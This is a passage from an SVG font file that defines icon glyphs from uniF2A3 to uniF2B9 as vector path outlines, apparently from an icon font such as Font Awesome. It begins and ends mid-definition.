d="M128 -192q0 -26 -19 -45t-45 -19t-45 19t-19 45t19 45t45 19t45 -19t19 -45zM320 0q0 -26 -19 -45t-45 -19t-45 19t-19 45t19 45t45 19t45 -19t19 -45zM365 365l256 -256l-90 -90l-256 256zM704 384q0 -26 -19 -45t-45 -19t-45 19t-19 45t19 45t45 19t45 -19t19 -45z
M1411 704q0 -59 -11.5 -108.5t-37.5 -93.5t-44 -67.5t-53 -64.5q-31 -35 -45.5 -54t-33.5 -50t-26.5 -64t-7.5 -74q0 -159 -112.5 -271.5t-271.5 -112.5q-26 0 -45 19t-19 45t19 45t45 19q106 0 181 75t75 181q0 57 11.5 105.5t37 91t43.5 66.5t52 63q40 46 59.5 72
t37.5 74.5t18 103.5q0 185 -131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5q0 -26 -19 -45t-45 -19t-45 19t-19 45q0 117 45.5 223.5t123 184t184 123t223.5 45.5t223.5 -45.5t184 -123t123 -184t45.5 -223.5zM896 576q0 -26 -19 -45t-45 -19t-45 19t-19 45t19 45
t45 19t45 -19t19 -45zM1184 704q0 -26 -19 -45t-45 -19t-45 19t-19 45q0 93 -65.5 158.5t-158.5 65.5q-92 0 -158 -65.5t-66 -158.5q0 -26 -19 -45t-45 -19t-45 19t-19 45q0 146 103 249t249 103t249 -103t103 -249zM1578 993q10 -25 -1 -49t-36 -34q-9 -4 -23 -4
q-19 0 -35.5 11t-23.5 30q-68 178 -224 295q-21 16 -25 42t12 47q17 21 43 25t47 -12q183 -137 266 -351zM1788 1074q9 -25 -1.5 -49t-35.5 -34q-11 -4 -23 -4q-44 0 -60 41q-92 238 -297 393q-22 16 -25.5 42t12.5 47q16 22 42 25.5t47 -12.5q235 -175 341 -449z" />
    <glyph glyph-name="uniF2A3" unicode="&#xf2a3;" horiz-adv-x="2304" 
d="M1032 576q-59 2 -84 55q-17 34 -48 53.5t-68 19.5q-53 0 -90.5 -37.5t-37.5 -90.5q0 -56 36 -89l10 -8q34 -31 82 -31q37 0 68 19.5t48 53.5q25 53 84 55zM1600 704q0 56 -36 89l-10 8q-34 31 -82 31q-37 0 -68 -19.5t-48 -53.5q-25 -53 -84 -55q59 -2 84 -55
q17 -34 48 -53.5t68 -19.5q53 0 90.5 37.5t37.5 90.5zM1174 925q-17 -35 -55 -48t-73 4q-62 31 -134 31q-51 0 -99 -17q3 0 9.5 0.5t9.5 0.5q92 0 170.5 -50t118.5 -133q17 -36 3.5 -73.5t-49.5 -54.5q-18 -9 -39 -9q21 0 39 -9q36 -17 49.5 -54.5t-3.5 -73.5
q-40 -83 -118.5 -133t-170.5 -50h-6q-16 2 -44 4l-290 27l-239 -120q-14 -7 -29 -7q-40 0 -57 35l-160 320q-11 23 -4 47.5t29 37.5l209 119l148 267q17 155 91.5 291.5t195.5 236.5q31 25 70.5 21.5t64.5 -34.5t21.5 -70t-34.5 -65q-70 -59 -117 -128q123 84 267 101
q40 5 71.5 -19t35.5 -64q5 -40 -19 -71.5t-64 -35.5q-84 -10 -159 -55q46 10 99 10q115 0 218 -50q36 -18 49 -55.5t-5 -73.5zM2137 1085l160 -320q11 -23 4 -47.5t-29 -37.5l-209 -119l-148 -267q-17 -155 -91.5 -291.5t-195.5 -236.5q-26 -22 -61 -22q-45 0 -74 35
q-25 31 -21.5 70t34.5 65q70 59 117 128q-123 -84 -267 -101q-4 -1 -12 -1q-36 0 -63.5 24t-31.5 60q-5 40 19 71.5t64 35.5q84 10 159 55q-46 -10 -99 -10q-115 0 -218 50q-36 18 -49 55.5t5 73.5q17 35 55 48t73 -4q62 -31 134 -31q51 0 99 17q-3 0 -9.5 -0.5t-9.5 -0.5
q-92 0 -170.5 50t-118.5 133q-17 36 -3.5 73.5t49.5 54.5q18 9 39 9q-21 0 -39 9q-36 17 -49.5 54.5t3.5 73.5q40 83 118.5 133t170.5 50h6h1q14 -2 42 -4l291 -27l239 120q14 7 29 7q40 0 57 -35z" />
    <glyph glyph-name="uniF2A4" unicode="&#xf2a4;" horiz-adv-x="1792" 
d="M1056 704q0 -26 19 -45t45 -19t45 19t19 45q0 146 -103 249t-249 103t-249 -103t-103 -249q0 -26 19 -45t45 -19t45 19t19 45q0 93 66 158.5t158 65.5t158 -65.5t66 -158.5zM835 1280q-117 0 -223.5 -45.5t-184 -123t-123 -184t-45.5 -223.5q0 -26 19 -45t45 -19t45 19
t19 45q0 185 131.5 316.5t316.5 131.5t316.5 -131.5t131.5 -316.5q0 -55 -18 -103.5t-37.5 -74.5t-59.5 -72q-34 -39 -52 -63t-43.5 -66.5t-37 -91t-11.5 -105.5q0 -106 -75 -181t-181 -75q-26 0 -45 -19t-19 -45t19 -45t45 -19q159 0 271.5 112.5t112.5 271.5q0 41 7.5 74
t26.5 64t33.5 50t45.5 54q35 41 53 64.5t44 67.5t37.5 93.5t11.5 108.5q0 117 -45.5 223.5t-123 184t-184 123t-223.5 45.5zM591 561l226 -226l-579 -579q-12 -12 -29 -12t-29 12l-168 168q-12 12 -12 29t12 29zM1612 1524l168 -168q12 -12 12 -29t-12 -30l-233 -233
l-26 -25l-71 -71q-66 153 -195 258l91 91l207 207q13 12 30 12t29 -12z" />
    <glyph glyph-name="uniF2A5" unicode="&#xf2a5;" 
d="M866 1021q0 -27 -13 -94q-11 -50 -31.5 -150t-30.5 -150q-2 -11 -4.5 -12.5t-13.5 -2.5q-20 -2 -31 -2q-58 0 -84 49.5t-26 113.5q0 88 35 174t103 124q28 14 51 14q28 0 36.5 -16.5t8.5 -47.5zM1352 597q0 14 -39 75.5t-52 66.5q-21 8 -34 8q-91 0 -226 -77l-2 2
q3 22 27.5 135t24.5 178q0 233 -242 233q-24 0 -68 -6q-94 -17 -168.5 -89.5t-111.5 -166.5t-37 -189q0 -146 80.5 -225t227.5 -79q25 0 25 -3t-1 -5q-4 -34 -26 -117q-14 -52 -51.5 -101t-82.5 -49q-42 0 -42 47q0 24 10.5 47.5t25 39.5t29.5 28.5t26 20t11 8.5q0 3 -7 10
q-24 22 -58.5 36.5t-65.5 14.5q-35 0 -63.5 -34t-41 -75t-12.5 -75q0 -88 51.5 -142t138.5 -54q82 0 155 53t117.5 126t65.5 153q6 22 15.5 66.5t14.5 66.5q3 12 14 18q118 60 227 60q48 0 127 -18q1 -1 4 -1q5 0 9.5 4.5t4.5 8.5zM1536 1120v-960q0 -119 -84.5 -203.5
t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="uniF2A6" unicode="&#xf2a6;" horiz-adv-x="1535" 
d="M744 1231q0 24 -2 38.5t-8.5 30t-21 23t-37.5 7.5q-39 0 -78 -23q-105 -58 -159 -190.5t-54 -269.5q0 -44 8.5 -85.5t26.5 -80.5t52.5 -62.5t81.5 -23.5q4 0 18 -0.5t20 0t16 3t15 8.5t7 16q16 77 48 231.5t48 231.5q19 91 19 146zM1498 575q0 -7 -7.5 -13.5t-15.5 -6.5
l-6 1q-22 3 -62 11t-72 12.5t-63 4.5q-167 0 -351 -93q-15 -8 -21 -27q-10 -36 -24.5 -105.5t-22.5 -100.5q-23 -91 -70 -179.5t-112.5 -164.5t-154.5 -123t-185 -47q-135 0 -214.5 83.5t-79.5 219.5q0 53 19.5 117t63 116.5t97.5 52.5q38 0 120 -33.5t83 -61.5
q0 -1 -16.5 -12.5t-39.5 -31t-46 -44.5t-39 -61t-16 -74q0 -33 16.5 -53t48.5 -20q45 0 85 31.5t66.5 78t48 105.5t32.5 107t16 90v9q0 2 -3.5 3.5t-8.5 1.5h-10t-10 -0.5t-6 -0.5q-227 0 -352 122.5t-125 348.5q0 108 34.5 221t96 210t156 167.5t204.5 89.5q52 9 106 9
q374 0 374 -360q0 -98 -38 -273t-43 -211l3 -3q101 57 182.5 88t167.5 31q22 0 53 -13q19 -7 80 -102.5t61 -116.5z" />
    <glyph glyph-name="uniF2A7" unicode="&#xf2a7;" horiz-adv-x="1664" 
d="M831 863q32 0 59 -18l222 -148q61 -40 110 -97l146 -170q40 -46 29 -106l-72 -413q-6 -32 -29.5 -53.5t-55.5 -25.5l-527 -56l-352 -32h-9q-39 0 -67.5 28t-28.5 68q0 37 27 64t65 32l260 32h-448q-41 0 -69.5 30t-26.5 71q2 39 32 65t69 26l442 1l-521 64q-41 5 -66 37
t-19 73q6 35 34.5 57.5t65.5 22.5h10l481 -60l-351 94q-38 10 -62 41.5t-18 68.5q6 36 33 58.5t62 22.5q6 0 20 -2l448 -96l217 -37q1 0 3 -0.5t3 -0.5q23 0 30.5 23t-12.5 36l-186 125q-35 23 -42 63.5t18 73.5q27 38 76 38zM761 661l186 -125l-218 37l-5 2l-36 38
l-238 262q-1 1 -2.5 3.5t-2.5 3.5q-24 31 -18.5 70t37.5 64q31 23 68 17.5t64 -33.5l142 -147q-2 -1 -5 -3.5t-4 -4.5q-32 -45 -23 -99t55 -85zM1648 1115l15 -266q4 -73 -11 -147l-48 -219q-12 -59 -67 -87l-106 -54q2 62 -39 109l-146 170q-53 61 -117 103l-222 148
q-34 23 -76 23q-51 0 -88 -37l-235 312q-25 33 -18 73.5t41 63.5q33 22 71.5 14t62.5 -40l266 -352l-262 455q-21 35 -10.5 75t47.5 59q35 18 72.5 6t57.5 -46l241 -420l-136 337q-15 35 -4.5 74t44.5 56q37 19 76 6t56 -51l193 -415l101 -196q8 -15 23 -17.5t27 7.5t11 26
l-12 224q-2 41 26 71t69 31q39 0 67 -28.5t30 -67.5z" />
    <glyph glyph-name="uniF2A8" unicode="&#xf2a8;" horiz-adv-x="1792" 
d="M335 180q-2 0 -6 2q-86 57 -168.5 145t-139.5 180q-21 30 -21 69q0 9 2 19t4 18t7 18t8.5 16t10.5 17t10 15t12 15.5t11 14.5q184 251 452 365q-110 198 -110 211q0 19 17 29q116 64 128 64q18 0 28 -16l124 -229q92 19 192 19q266 0 497.5 -137.5t378.5 -369.5
q20 -31 20 -69t-20 -69q-91 -142 -218.5 -253.5t-278.5 -175.5q110 -198 110 -211q0 -20 -17 -29q-116 -64 -127 -64q-19 0 -29 16l-124 229l-64 119l-444 820l7 7q-58 -24 -99 -47q3 -5 127 -234t243 -449t119 -223q0 -7 -9 -9q-13 -3 -72 -3q-57 0 -60 7l-456 841
q-39 -28 -82 -68q24 -43 214 -393.5t190 -354.5q0 -10 -11 -10q-14 0 -82.5 22t-72.5 28l-106 197l-224 413q-44 -53 -78 -106q2 -3 18 -25t23 -34l176 -327q0 -10 -10 -10zM1165 282l49 -91q273 111 450 385q-180 277 -459 389q67 -64 103 -148.5t36 -176.5
q0 -106 -47 -200.5t-132 -157.5zM848 896q0 -20 14 -34t34 -14q86 0 147 -61t61 -147q0 -20 14 -34t34 -14t34 14t14 34q0 126 -89 215t-215 89q-20 0 -34 -14t-14 -34zM1214 961l-9 4l7 -7z" />
    <glyph glyph-name="uniF2A9" unicode="&#xf2a9;" horiz-adv-x="1280" 
d="M1050 430q0 -215 -147 -374q-148 -161 -378 -161q-232 0 -378 161q-147 159 -147 374q0 147 68 270.5t189 196.5t268 73q96 0 182 -31q-32 -62 -39 -126q-66 28 -143 28q-167 0 -280.5 -123t-113.5 -291q0 -170 112.5 -288.5t281.5 -118.5t281 118.5t112 288.5
q0 89 -32 166q66 13 123 49q41 -98 41 -212zM846 619q0 -192 -79.5 -345t-238.5 -253l-14 -1q-29 0 -62 5q83 32 146.5 102.5t99.5 154.5t58.5 189t30 192.5t7.5 178.5q0 69 -3 103q55 -160 55 -326zM791 947v-2q-73 214 -206 440q88 -59 142.5 -186.5t63.5 -251.5z
M1035 744q-83 0 -160 75q218 120 290 247q19 37 21 56q-42 -94 -139.5 -166.5t-204.5 -97.5q-35 54 -35 113q0 37 17 79t43 68q46 44 157 74q59 16 106 58.5t74 100.5q74 -105 74 -253q0 -109 -24 -170q-32 -77 -88.5 -130.5t-130.5 -53.5z" />
    <glyph glyph-name="uniF2AA" unicode="&#xf2aa;" 
d="M1050 495q0 78 -28 147q-41 -25 -85 -34q22 -50 22 -114q0 -117 -77 -198.5t-193 -81.5t-193.5 81.5t-77.5 198.5q0 115 78 199.5t193 84.5q53 0 98 -19q4 43 27 87q-60 21 -125 21q-154 0 -257.5 -108.5t-103.5 -263.5t103.5 -261t257.5 -106t257.5 106.5t103.5 260.5z
M872 850q2 -24 2 -71q0 -63 -5 -123t-20.5 -132.5t-40.5 -130t-68.5 -106t-100.5 -70.5q21 -3 42 -3h10q219 139 219 411q0 116 -38 225zM872 850q-4 80 -44 171.5t-98 130.5q92 -156 142 -302zM1207 955q0 102 -51 174q-41 -86 -124 -109q-69 -19 -109 -53.5t-40 -99.5
q0 -40 24 -77q74 17 140.5 67t95.5 115q-4 -52 -74.5 -111.5t-138.5 -97.5q52 -52 110 -52q51 0 90 37t60 90q17 42 17 117zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5
t84.5 -203.5z" />
    <glyph glyph-name="uniF2AB" unicode="&#xf2ab;" 
d="M1279 388q0 22 -22 27q-67 15 -118 59t-80 108q-7 19 -7 25q0 15 19.5 26t43 17t43 20.5t19.5 36.5q0 19 -18.5 31.5t-38.5 12.5q-12 0 -32 -8t-31 -8q-4 0 -12 2q5 95 5 114q0 79 -17 114q-36 78 -103 121.5t-152 43.5q-199 0 -275 -165q-17 -35 -17 -114q0 -19 5 -114
q-4 -2 -14 -2q-12 0 -32 7.5t-30 7.5q-21 0 -38.5 -12t-17.5 -32q0 -21 19.5 -35.5t43 -20.5t43 -17t19.5 -26q0 -6 -7 -25q-64 -138 -198 -167q-22 -5 -22 -27q0 -46 137 -68q2 -5 6 -26t11.5 -30.5t23.5 -9.5q12 0 37.5 4.5t39.5 4.5q35 0 67 -15t54 -32.5t57.5 -32.5
t76.5 -15q43 0 79 15t57.5 32.5t53.5 32.5t67 15q14 0 39.5 -4t38.5 -4q16 0 23 10t11 30t6 25q137 22 137 68zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5
t103 -385.5z" />
    <glyph glyph-name="uniF2AC" unicode="&#xf2ac;" horiz-adv-x="1664" 
d="M848 1408q134 1 240.5 -68.5t163.5 -192.5q27 -58 27 -179q0 -47 -9 -191q14 -7 28 -7q18 0 51 13.5t51 13.5q29 0 56 -18t27 -46q0 -32 -31.5 -54t-69 -31.5t-69 -29t-31.5 -47.5q0 -15 12 -43q37 -82 102.5 -150t144.5 -101q28 -12 80 -23q28 -6 28 -35
q0 -70 -219 -103q-7 -11 -11 -39t-14 -46.5t-33 -18.5q-20 0 -62 6.5t-64 6.5q-37 0 -62 -5q-32 -5 -63 -22.5t-58 -38t-58 -40.5t-76 -33.5t-99 -13.5q-52 0 -96.5 13.5t-75 33.5t-57.5 40.5t-58 38t-62 22.5q-26 5 -63 5q-24 0 -65.5 -7.5t-58.5 -7.5q-25 0 -35 18.5
t-14 47.5t-11 40q-219 33 -219 103q0 29 28 35q52 11 80 23q78 32 144.5 101t102.5 150q12 28 12 43q0 28 -31.5 47.5t-69.5 29.5t-69.5 31.5t-31.5 52.5q0 27 26 45.5t55 18.5q15 0 48 -13t53 -13q18 0 32 7q-9 142 -9 190q0 122 27 180q64 137 172 198t264 63z" />
    <glyph glyph-name="uniF2AD" unicode="&#xf2ad;" 
d="M1280 388q0 22 -22 27q-67 14 -118 58t-80 109q-7 14 -7 25q0 15 19.5 26t42.5 17t42.5 20.5t19.5 36.5q0 19 -18.5 31.5t-38.5 12.5q-11 0 -31 -8t-32 -8q-4 0 -12 2q5 63 5 115q0 78 -17 114q-36 78 -102.5 121.5t-152.5 43.5q-198 0 -275 -165q-18 -38 -18 -115
q0 -38 6 -114q-10 -2 -15 -2q-11 0 -31.5 8t-30.5 8q-20 0 -37.5 -12.5t-17.5 -32.5q0 -21 19.5 -35.5t42.5 -20.5t42.5 -17t19.5 -26q0 -11 -7 -25q-64 -138 -198 -167q-22 -5 -22 -27q0 -47 138 -69q2 -5 6 -26t11 -30.5t23 -9.5q13 0 38.5 5t38.5 5q35 0 67.5 -15
t54.5 -32.5t57.5 -32.5t76.5 -15q43 0 79 15t57.5 32.5t54 32.5t67.5 15q13 0 39 -4.5t39 -4.5q15 0 22.5 9.5t11.5 31t5 24.5q138 22 138 69zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960
q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="uniF2AE" unicode="&#xf2ae;" horiz-adv-x="2304" 
d="M2304 1536q-69 -46 -125 -92t-89 -81t-59.5 -71.5t-37.5 -57.5t-22 -44.5t-14 -29.5q-10 -18 -35.5 -136.5t-48.5 -164.5q-15 -29 -50 -60.5t-67.5 -50.5t-72.5 -41t-48 -28q-47 -31 -151 -231q-341 14 -630 -158q-92 -53 -303 -179q47 16 86 31t55 22l15 7
q71 27 163 64.5t133.5 53.5t108 34.5t142.5 31.5q186 31 465 -7q1 0 10 -3q11 -6 14 -17t-3 -22l-194 -345q-15 -29 -47 -22q-128 24 -354 24q-146 0 -402 -44.5t-392 -46.5q-82 -1 -149 13t-107 37t-61 40t-33 34l-1 1v2q0 6 6 6q138 0 371 55q192 366 374.5 524t383.5 158
q5 0 14.5 -0.5t38 -5t55 -12t61.5 -24.5t63 -39.5t54 -59t40 -82.5l102 177q2 4 21 42.5t44.5 86.5t61 109.5t84 133.5t100.5 137q66 82 128 141.5t121.5 96.5t92.5 53.5t88 39.5z" />
    <glyph glyph-name="uniF2B0" unicode="&#xf2b0;" 
d="M1322 640q0 -45 -5 -76l-236 14l224 -78q-19 -73 -58 -141l-214 103l177 -158q-44 -61 -107 -108l-157 178l103 -215q-61 -37 -140 -59l-79 228l14 -240q-38 -6 -76 -6t-76 6l14 238l-78 -226q-74 19 -140 59l103 215l-157 -178q-59 43 -108 108l178 158l-214 -104
q-39 69 -58 141l224 79l-237 -14q-5 42 -5 76q0 35 5 77l238 -14l-225 79q19 73 58 140l214 -104l-177 159q46 61 107 108l158 -178l-103 215q67 39 140 58l77 -224l-13 236q36 6 75 6q38 0 76 -6l-14 -237l78 225q74 -19 140 -59l-103 -214l158 178q61 -47 107 -108
l-177 -159l213 104q37 -62 58 -141l-224 -78l237 14q5 -31 5 -77zM1352 640q0 160 -78.5 295.5t-213 214t-292.5 78.5q-119 0 -227 -46.5t-186.5 -125t-124.5 -187.5t-46 -229q0 -119 46 -228t124.5 -187.5t186.5 -125t227 -46.5q158 0 292.5 78.5t213 214t78.5 294.5z
M1425 1023v-766l-657 -383l-657 383v766l657 383zM768 -183l708 412v823l-708 411l-708 -411v-823zM1536 1088v-896l-768 -448l-768 448v896l768 448z" />
    <glyph glyph-name="uniF2B1" unicode="&#xf2b1;" horiz-adv-x="1664" 
d="M339 1318h691l-26 -72h-665q-110 0 -188.5 -79t-78.5 -189v-771q0 -95 60.5 -169.5t153.5 -93.5q23 -5 98 -5v-72h-45q-140 0 -239.5 100t-99.5 240v771q0 140 99.5 240t239.5 100zM1190 1536h247l-482 -1294q-23 -61 -40.5 -103.5t-45 -98t-54 -93.5t-64.5 -78.5
t-79.5 -65t-95.5 -41t-116 -18.5v195q163 26 220 182q20 52 20 105q0 54 -20 106l-285 733h228l187 -585zM1664 978v-1111h-795q37 55 45 73h678v1038q0 85 -49.5 155t-129.5 99l25 67q101 -34 163.5 -123.5t62.5 -197.5z" />
    <glyph glyph-name="uniF2B2" unicode="&#xf2b2;" horiz-adv-x="1792" 
d="M852 1227q0 -29 -17 -52.5t-45 -23.5t-45 23.5t-17 52.5t17 52.5t45 23.5t45 -23.5t17 -52.5zM688 -149v114q0 30 -20.5 51.5t-50.5 21.5t-50 -21.5t-20 -51.5v-114q0 -30 20.5 -52t49.5 -22q30 0 50.5 22t20.5 52zM860 -149v114q0 30 -20 51.5t-50 21.5t-50.5 -21.5
t-20.5 -51.5v-114q0 -30 20.5 -52t50.5 -22q29 0 49.5 22t20.5 52zM1034 -149v114q0 30 -20.5 51.5t-50.5 21.5t-50.5 -21.5t-20.5 -51.5v-114q0 -30 20.5 -52t50.5 -22t50.5 22t20.5 52zM1208 -149v114q0 30 -20.5 51.5t-50.5 21.5t-50.5 -21.5t-20.5 -51.5v-114
q0 -30 20.5 -52t50.5 -22t50.5 22t20.5 52zM1476 535q-84 -160 -232 -259.5t-323 -99.5q-123 0 -229.5 51.5t-178.5 137t-113 197.5t-41 232q0 88 21 174q-104 -175 -104 -390q0 -162 65 -312t185 -251q30 57 91 57q56 0 86 -50q32 50 87 50q56 0 86 -50q32 50 87 50t87 -50
q30 50 86 50q28 0 52.5 -15.5t37.5 -40.5q112 94 177 231.5t73 287.5zM1326 564q0 75 -72 75q-17 0 -47 -6q-95 -19 -149 -19q-226 0 -226 243q0 86 30 204q-83 -127 -83 -275q0 -150 89 -260.5t235 -110.5q111 0 210 70q13 48 13 79zM884 1223q0 50 -32 89.5t-81 39.5
t-81 -39.5t-32 -89.5q0 -51 31.5 -90.5t81.5 -39.5t81.5 39.5t31.5 90.5zM1513 884q0 96 -37.5 179t-113 137t-173.5 54q-77 0 -149 -35t-127 -94q-48 -159 -48 -268q0 -104 45.5 -157t147.5 -53q53 0 142 19q36 6 53 6q51 0 77.5 -28t26.5 -80q0 -26 -4 -46
q75 68 117.5 165.5t42.5 200.5zM1792 667q0 -111 -33.5 -249.5t-93.5 -204.5q-58 -64 -195 -142.5t-228 -104.5l-4 -1v-114q0 -43 -29.5 -75t-72.5 -32q-56 0 -86 50q-32 -50 -87 -50t-87 50q-30 -50 -86 -50q-55 0 -87 50q-30 -50 -86 -50q-47 0 -75 33.5t-28 81.5
q-90 -68 -198 -68q-118 0 -211 80q54 1 106 20q-113 31 -182 127q32 -7 71 -7q89 0 164 46q-192 192 -240 306q-24 56 -24 160q0 57 9 125.5t31.5 146.5t55 141t86.5 105t120 42q59 0 81 -52q19 29 42 54q2 3 12 13t13 16q10 15 23 38t25 42t28 39q87 111 211.5 177
t260.5 66q35 0 62 -4q59 64 146 64q83 0 140 -57q5 -5 5 -12q0 -5 -6 -13.5t-12.5 -16t-16 -17l-10.5 -10.5q17 -6 36 -18t19 -24q0 -6 -16 -25q157 -138 197 -378q25 30 60 30q45 0 100 -49q90 -80 90 -279z" />
    <glyph glyph-name="uniF2B3" unicode="&#xf2b3;" 
d="M917 631q0 33 -6 64h-362v-132h217q-12 -76 -74.5 -120.5t-142.5 -44.5q-99 0 -169 71.5t-70 170.5t70 170.5t169 71.5q93 0 153 -59l104 101q-108 100 -257 100q-160 0 -272 -112.5t-112 -271.5t112 -271.5t272 -112.5q165 0 266.5 105t101.5 270zM1262 585h109v110
h-109v110h-110v-110h-110v-110h110v-110h110v110zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="uniF2B4" unicode="&#xf2b4;" 
d="M1536 1024v-839q0 -48 -49 -62q-174 -52 -338 -52q-73 0 -215.5 29.5t-227.5 29.5q-164 0 -370 -48v-338h-160v1368q-63 25 -101 81t-38 124q0 91 64 155t155 64t155 -64t64 -155q0 -68 -38 -124t-101 -81v-68q190 44 343 44q99 0 198 -15q14 -2 111.5 -22.5t149.5 -20.5
q77 0 165 18q11 2 80 21t89 19q26 0 45 -19t19 -45z" />
    <glyph glyph-name="uniF2B5" unicode="&#xf2b5;" horiz-adv-x="2304" 
d="M192 384q40 0 56 32t0 64t-56 32t-56 -32t0 -64t56 -32zM1665 442q-10 13 -38.5 50t-41.5 54t-38 49t-42.5 53t-40.5 47t-45 49l-125 -140q-83 -94 -208.5 -92t-205.5 98q-57 69 -56.5 158t58.5 157l177 206q-22 11 -51 16.5t-47.5 6t-56.5 -0.5t-49 -1q-92 0 -158 -66
l-158 -158h-155v-544q5 0 21 0.5t22 0t19.5 -2t20.5 -4.5t17.5 -8.5t18.5 -13.5l297 -292q115 -111 227 -111q78 0 125 47q57 -20 112.5 8t72.5 85q74 -6 127 44q20 18 36 45.5t14 50.5q10 -10 43 -10q43 0 77 21t49.5 53t12 71.5t-30.5 73.5zM1824 384h96v512h-93l-157 180
q-66 76 -169 76h-167q-89 0 -146 -67l-209 -243q-28 -33 -28 -75t27 -75q43 -51 110 -52t111 49l193 218q25 23 53.5 21.5t47 -27t8.5 -56.5q16 -19 56 -63t60 -68q29 -36 82.5 -105.5t64.5 -84.5q52 -66 60 -140zM2112 384q40 0 56 32t0 64t-56 32t-56 -32t0 -64t56 -32z
M2304 960v-640q0 -26 -19 -45t-45 -19h-434q-27 -65 -82 -106.5t-125 -51.5q-33 -48 -80.5 -81.5t-102.5 -45.5q-42 -53 -104.5 -81.5t-128.5 -24.5q-60 -34 -126 -39.5t-127.5 14t-117 53.5t-103.5 81l-287 282h-358q-26 0 -45 19t-19 45v672q0 26 19 45t45 19h421
q14 14 47 48t47.5 48t44 40t50.5 37.5t51 25.5t62 19.5t68 5.5h117q99 0 181 -56q82 56 181 56h167q35 0 67 -6t56.5 -14.5t51.5 -26.5t44.5 -31t43 -39.5t39 -42t41 -48t41.5 -48.5h355q26 0 45 -19t19 -45z" />
    <glyph glyph-name="uniF2B6" unicode="&#xf2b6;" horiz-adv-x="1792" 
d="M1792 882v-978q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v978q0 15 11 24q8 7 39 34.5t41.5 36t45.5 37.5t70 55.5t96 73t143.5 107t192.5 140.5q5 4 52.5 40t71.5 52.5t64 35t69 18.5t69 -18.5t65 -35.5t71 -52t52 -40q110 -80 192.5 -140.5t143.5 -107
t96 -73t70 -55.5t45.5 -37.5t41.5 -36t39 -34.5q11 -9 11 -24zM1228 297q263 191 345 252q11 8 12.5 20.5t-6.5 23.5l-38 52q-8 11 -21 12.5t-24 -6.5q-231 -169 -343 -250q-5 -3 -52 -39t-71.5 -52.5t-64.5 -35t-69 -18.5t-69 18.5t-64.5 35t-71.5 52.5t-52 39
q-186 134 -343 250q-11 8 -24 6.5t-21 -12.5l-38 -52q-8 -11 -6.5 -23.5t12.5 -20.5q82 -61 345 -252q10 -8 50 -38t65 -47t64 -39.5t77.5 -33.5t75.5 -11t75.5 11t79 34.5t64.5 39.5t65 47.5t48 36.5z" />
    <glyph glyph-name="uniF2B7" unicode="&#xf2b7;" horiz-adv-x="1792" 
d="M1474 623l39 -51q8 -11 6.5 -23.5t-11.5 -20.5q-43 -34 -126.5 -98.5t-146.5 -113t-67 -51.5q-39 -32 -60 -48t-60.5 -41t-76.5 -36.5t-74 -11.5h-1h-1q-37 0 -74 11.5t-76 36.5t-61 41.5t-60 47.5q-5 4 -65 50.5t-143.5 111t-122.5 94.5q-11 8 -12.5 20.5t6.5 23.5
l37 52q8 11 21.5 13t24.5 -7q94 -73 306 -236q5 -4 43.5 -35t60.5 -46.5t56.5 -32.5t58.5 -17h1h1q24 0 58.5 17t56.5 32.5t60.5 46.5t43.5 35q258 198 313 242q11 8 24 6.5t21 -12.5zM1664 -96v928q-90 83 -159 139q-91 74 -389 304q-3 2 -43 35t-61 48t-56 32.5t-59 17.5
h-1h-1q-24 0 -59 -17.5t-56 -32.5t-61 -48t-43 -35q-215 -166 -315.5 -245.5t-129.5 -104t-82 -74.5q-14 -12 -21 -19v-928q0 -13 9.5 -22.5t22.5 -9.5h1472q13 0 22.5 9.5t9.5 22.5zM1792 832v-928q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v928q0 56 41 94
q123 114 350 290.5t233 181.5q36 30 59 47.5t61.5 42t76 36.5t74.5 12h1h1q37 0 74.5 -12t76 -36.5t61.5 -42t59 -47.5q43 -36 156 -122t226 -177t201 -173q41 -38 41 -94z" />
    <glyph glyph-name="uniF2B8" unicode="&#xf2b8;" 
d="M330 1l202 -214l-34 236l-216 213zM556 -225l274 218l-11 245l-300 -215zM245 413l227 -213l-48 327l-245 204zM495 189l317 214l-14 324l-352 -200zM843 178l95 -80l-2 239l-103 79q0 -1 1 -8.5t0 -12t-5 -7.5l-78 -52l85 -70q7 -6 7 -88zM138 930l256 -200l-68 465
l-279 173zM1173 267l15 234l-230 -164l2 -240zM417 722l373 194l-19 441l-423 -163zM1270 357l20 233l-226 142l-2 -105l144 -95q6 -4 4 -9l-7 -119zM1461 496l30 222l-179 -128l-20 -228zM1273 329l-71 49l-8 -117q0 -5 -4 -8l-234 -187q-7 -5 -14 0l-98 83l7 -161
q0 -5 -4 -8l-293 -234q-4 -2 -6 -2q-8 2 -8 3l-228 242q-4 4 -59 277q-2 7 5 11l61 37q-94 86 -95 92l-72 351q-2 7 6 12l94 45q-133 100 -135 108l-96 466q-2 10 7 13l433 135q5 0 8 -1l317 -153q6 -4 6 -9l20 -463q0 -7 -6 -10l-118 -61l126 -85q5 -2 5 -8l5 -123l121 74
q5 4 11 0l84 -56l3 110q0 6 5 9l206 126q6 3 11 0l245 -135q4 -4 5 -7t-6.5 -60t-17.5 -124.5t-10 -70.5q0 -5 -4 -7l-191 -153q-6 -5 -13 0z" />
    <glyph glyph-name="uniF2B9" unicode="&#xf2b9;" horiz-adv-x="1664" 
